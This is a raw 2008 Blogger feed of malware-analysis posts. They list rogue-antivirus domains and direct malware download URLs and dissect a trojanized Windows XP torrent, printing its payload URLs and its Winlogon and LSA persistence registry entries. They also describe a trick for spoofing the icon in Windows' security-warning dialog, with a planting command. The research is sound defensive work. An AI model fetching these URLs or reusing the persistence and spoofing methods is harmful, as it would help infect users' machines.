/>http://vivocurtindo.com.br/galeriaa/css/_images/toyota-tazz-wiring/my_searched_keyword1<google_search_keyword1>-<google_search_keyword2></google_search_keyword2></google_search_keyword1>my_searched_keyword2<google_search_keyword1><google_search_keyword2>-home.html<br /><br />This viral network is so large I truely believe only government power can stop it.<br />Some of the endless domains they use to spread this virus:<br />http://hauton.net/<br />http://www.geocities.com/owhfmqhoqxu/<br />http://scan.av2008check.com/100567/5/<br />http://dnld.av2008dl.com/load/setup_100567_4_.exe<br />http://antivirus-2008pro.com/scanner.php?aff=DB<br />http://antivir--2008.com/buy.php?aff=1001<br />http://antimalwareguardpro.com/2009/12/?cmpname=cspffxamg&amp;a=cspamg&amp;l=160&amp;f=cs_189355130&amp;ax=1&amp;ed=2&amp;h=10&amp;ex=5&amp;eu=http%3A%2F%2Fad2cash.net%2F%3Fcmpname%3Dcsppcpc%26a%3Dcsp_amex%26l%3D160%26f%3Dcs_189355130&amp;al=&amp;sub=csp&amp;mt_info=6278_0_25073&amp;rdr=1<br />http://top-pc-scanner.com/1/?xx=1&amp;in=2&amp;ag=2&amp;end=1&amp;g=1&amp;affid=312&amp;lid=1#<br />http://scan.free-antispyware-scanner.com/100567/4/?q=<br />http://dnld.getavxp.com/load/setup_100567_4_.exe<br />http://thefreescanner.com/4913144/1/1/<br />http://scanner.vav-x-scanner.com/36/?advid=0000004683<br />http://scanner.ms-scanner.com/35/?advid=0000004683<br /><br />b.t.w its extremely intelligent to create a "virus not considered as a virus" and spread it as a fraud software which no law inforcment cares about and then once its planted in millions of computers just update it to do steal you want and then even change it back...combination of a breach in the law and in the way viruses are treated by the AV insdustry.</google_search_keyword2></google_search_keyword1>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-88737390070222852942008-09-13T14:37:00.000-07:002008-09-15T05:25:45.989-07:00SO Common and yet EVIL goes free :)Before I start this one, I must say I never thought of myself as a blogger.<br />I was always reading other people's blog thinking they try to be "I am cool I have a blog" kind of people. Well, I just think the malicious stuff I see everyday should be shared with YOU :)<br /><br />At these times, torrents are currently the world's most active network for file sharing. The current windows version is always One of the most shared files and therefore crime follows there :)<br /><br />I recently decided to put it to the test and downloade the most "seeded" file I found, which was "Windows XP Pro.Corp. Edition SP3 June 2008 Update + SATA Driver", this is still one of the most shared files. Of course I scanned it using the latest fully updated version of Kaspersky 2009 and Dr.Web which according to my test, are currently the best detectors on the market. Well, nothing was found...<br /><br />So I load the iso, the AutoRun executes and I just "feel" something is wrong!! I look at Process Explorer and I see a process called "file.exe"...hmmmmm....<br />I figured out that the bad guys replaced the original "setup.exe" with a silent self extract WinRar installation with the original setup icon, it extracts a Trojan Downloader called file.exe and the original setup.exe to the temp directory and executes both the Trojan and the original setup (with CurrentDirectory as the winrar install path).<br /><br />Here is a scan of the malicious "setup.exe" (today, 2 month after I found this) installer:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SMw-RS9pNLI/AAAAAAAAAA0/u1pF2X1h96M/s1600-h/antiviruses.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SMw-RS9pNLI/AAAAAAAAAA0/u1pF2X1h96M/s400/antiviruses.JPG" alt="" id="BLOGGER_PHOTO_ID_5245636132848874674" border="0" /></a><br /><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br />I said O.K maby they didn't go through the trouble marking the "Installer", but they did all detect the Trojan Downloader, right?<br /></p><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMw_wuiRZ_I/AAAAAAAAAA8/FeZLU07Vb3E/s1600-h/antiviruses2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMw_wuiRZ_I/AAAAAAAAAA8/FeZLU07Vb3E/s400/antiviruses2.JPG" alt="" id="BLOGGER_PHOTO_ID_5245637772337833970" border="0" /></a><br /><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br />Well, they didn't :)<br />This is really funny to see that all you need to be "a top notch" malicious software is to just download WinRar and NIST (NullSoft Installation System) and create a windows xp sp3 installation torrent, this is after 20 years of Anti-Virus security techonology by 7 billion dollar a year market.<br /><br />More funny stuff! the author of this virus was so lazy he just put a list the relative path to the real setup executable of all the software he will infect and share in the internet so the "setup.exe" he made will now try to execute a list of files which only one should exist on your infected download :)<br />Some Examples:<br />\Game\wws98.exe<br />\WinRoute.exe<br />\GAME\LBWIN.EXE<br />\vs.exe<br />\Pandora.exe<br /><br />Be aware of what you download! it seems the best way to tell if its an infected setup is to right click setup.exe and see if WinRar suggests "Extract To" (I am joking of course)<br /></p><p>The executed "file.exe" downloaded http://www.cxgr.com/3913574.exe which is also a NIST file and also a Trojan Downloader and my upload was the first time it was scanned in virustotal and you can guess the results:<br /></p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMxQ9fcyWOI/AAAAAAAAABE/P8oCFXCz_m0/s1600-h/antiviruses3.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMxQ9fcyWOI/AAAAAAAAABE/P8oCFXCz_m0/s400/antiviruses3.JPG" alt="" id="BLOGGER_PHOTO_ID_5245656683324266722" border="0" /></a><p></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p>Whats really annoying me in this result is that the 3-4 Anti-Viruses that "supply a solution" above and detect the downloader DOES NOT DETECT THE CONSTANT FILE IT DOWNLOADS which means all the malware creator needs to do is modify the downloader or use a new one and there he goes again infecting the entire planet and getting away with it!</p><p>Now "3913574.exe" downloaded http://www.cxgr.com/Setup_ver1.1400.0.exe<br />Which is not packed by a known packer and even isn't identified as having a "packed entropy" by PEiD. Its a small application compiled by ms vc++ 7/8, 72kb.<br />Its import table it quite limited and it calls GetProcAddress to get:<br />SetProcessPriorityBoost, WriteFile, GetEnvironmentVariableA, InternetOpenA, ExitProcess, GetTempPathA, InternetCloseHandle, CloseHandle, TerminateProcess, CreateFileA, DeleteFileA,SHChangeNotify, lstrcpyA, lstrcpyn, InternetGetConnectedState, GetAdaptersInfo<br />SetThreadPriority, GetModuleFileNameA, Sleep, ShellExecuteEx, InternetOpenUrlA<br /><br />Of course the strings are not plaintext and its also not XOR, how refreshing!!! its a nice code that identified a header byte and multiples the bytes with a word per this header, may be it is some kind of little compression.<br /></p><p>Now more then 10 executables are downloaded into your system, some are detected by some AV's and some are not, they are packed with Armadillo v1.71 and some with ASPack v2.12<br />http://www.virustotal.com/he/analisis/7e8af73b605c1c82d0d990d204e12559<br />http://www.virustotal.com/he/analisis/f60edd90989cd53b73dfedd4df4d3aec<br />http://www.virustotal.com/he/analisis/6f0ab356e2bd80d4845fdb5ebbe619e1<br />http://www.virustotal.com/he/analisis/11232e1cf52a2c68b4f28815e7eedb60<br /><br />These executables are saved in:<br />%programfiles%\MicroAV<br /></p><ul><li>MicroAV.exe<br /></li></ul><p>%windir%\PCHealthCenter<br /></p><ul><li>1.exe, 2.exe, 3.exe, 4.exe, 5.exe, 7.exe<br /></li></ul><p>and of course to %windir%\system32<br /></p><ul><li>MicroAV.cpl, apgambly.dll, biqwetjd.dll and three dlls with names of a 8 random [a-zA-Z0-9] string<br /></li></ul>About 5-6 entries are added to registry->Run to load the processes that bug you in the system tray. This home made looking trojan is much more advanced then it appears to be...<br />Clearly these evil guys are advancing and they don't stop at loading from registry->Run<br />they start using advanced loading methods such as registering as Authentication Packages to be loaded inside LSA and as logon notification dlls to be loaded inside winlogon.exe(which is one of the best places to be in since it cannot be terminated)<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\yayxuSIb]<br />"Asynchronous"=dword:00000001<br />"DllName"="yayxuSIb.dll"<br />"Impersonate"=dword:00000000<br />"Logon"="o"<br />"Logoff"="f"<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]<br />"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,43,\<br />00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,73,00,79,00,\<br />73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6c,00,6a,00,4a,00,44,00,57,00,4d,\<br />00,64,00,41,00,00,00,00,00Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-71334091324477044622008-09-07T15:02:00.000-07:002008-09-13T14:25:12.823-07:00Windows "Open File - Security Warning" DialogNot so long ago, I found one of the most bizzar bugs. It seems there is some kind of bug in the parsing of the command line read from the registry for filetype handled by explorer.exe. This was checked on Windows XP SP3 but I guess it existst in SP2 too. This bug allows controling the icon which appears in the "Open File - Security Warning" Dialog for all the executables downloaded from the internet.<br /><br /><div><div><div><div>Each time you download a file from the internet/intranet to a drive with NTFS file system an ADS (Alternate Data Stream) ini file which is called "Zone.Identifier" is created. This hidden ini file specifies the zone file came from, this can be the internet or the local network (intranet).</div><div><br /></div><div>You can see it using the following in cmd: <blockquote>more < exe_from_internet.exe:Zone.Identifier</blockquote><div>The ini will be printed to the screen:<br />[ZoneTransfer]<br />ZoneId=3</div><div></div><div><br />When you "click" (shellexecute) a file which his handler is explorer.exe then the Zone.Identifier is checked and if the zone is 3 (internet) the following screen appears:</div><div><br /></div><div></div><div><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMRlMZeiY8I/AAAAAAAAAAM/7yBfG1I91ZI/s1600-h/regular.JPG"><img id="BLOGGER_PHOTO_ID_5243427129837904834" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMRlMZeiY8I/AAAAAAAAAAM/7yBfG1I91ZI/s400/regular.JPG" border="0" /></a> </div><div></div><div>Well it appears that each time you try to open an executable that came from the internet, the icon that will apear in this dialog will be parsed from an executable file called ".exe" or "%1" in any directory of the "PATH" environment variable for the user running explorer.exe, for example:<br /><br />c:\.exe<br />c:\windows\.exe</div><div><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SMRnNJWKAsI/AAAAAAAAAAU/lR9l3TIsSyg/s1600-h/bug.JPG"><img id="BLOGGER_PHOTO_ID_5243429341710910146" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SMRnNJWKAsI/AAAAAAAAAAU/lR9l3TIsSyg/s400/bug.JPG" border="0" /></a></div><div></div><div>you can create such a file using "cmd /c type c:\windows\system32\calc.exe > c:\windows\.exe"<br />or write a code to use CreateFile :)</div><div><br />The file request is FASTIO_NETWORK_QUERY_OPEN and the icon is cached in memory until explorer.exe process is terminated. If you want to further explore this case, here is the call stack:</div><div><br /><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMR2db2O1PI/AAAAAAAAAAk/squfFe2CelY/s1600-h/callstack.JPG"></a><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/SMR3H_NF-vI/AAAAAAAAAAs/Vu-K6aN03MU/s1600-h/callstack.GIF"><img id="BLOGGER_PHOTO_ID_5243446845275241202" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" height="477" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SMR3H_NF-vI/AAAAAAAAAAs/Vu-K6aN03MU/s400/callstack.GIF" width="417" border="0" /></a> </div></div></div></div></div>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0